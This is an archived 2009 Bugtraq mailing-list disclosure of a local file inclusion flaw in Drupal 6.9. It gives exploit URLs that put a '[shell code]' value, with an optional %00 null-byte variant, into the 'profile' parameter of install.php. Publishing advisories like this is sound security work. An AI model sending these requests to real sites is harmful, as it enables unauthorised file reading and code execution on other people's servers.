Bugtraq mailing list archives
LFI in Drupal CMS
From: rasool.nasr () gmail com
Date: Sun, 8 Feb 2009 14:03:08 -0700
Author : Rasool Nasr ------------------------------------------- Discovered by : Rasool Nasr ------------------------------------------- Exploited By : Rasool Nasr ------------------------------------------- E-Mail : rasool.nasr () gmail com ------------------------------------------- WebSite : http://ircrash.com ------------------------------------------- Our Team : ircrash ------------------------------------------- IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr ------------------------------------------- CMS: Drupal ( Version 6.9 ) Download CMS : http://ftp.drupal.org/files/projects/drupal-6.9.tar.gz ------------------------------------------- LFI Exploit : http://[sitename]/drupal/install.php?profile=[shell code] or http://[sitename]/drupal/install.php?profile=[shell code]%00 -------------------------------------------
Current thread:
- LFI in Drupal CMS rasool . nasr (Feb 09)
- <Possible follow-ups>
- Re: LFI in Drupal CMS security (Feb 12)
- Re: LFI in Drupal CMS security (Feb 18)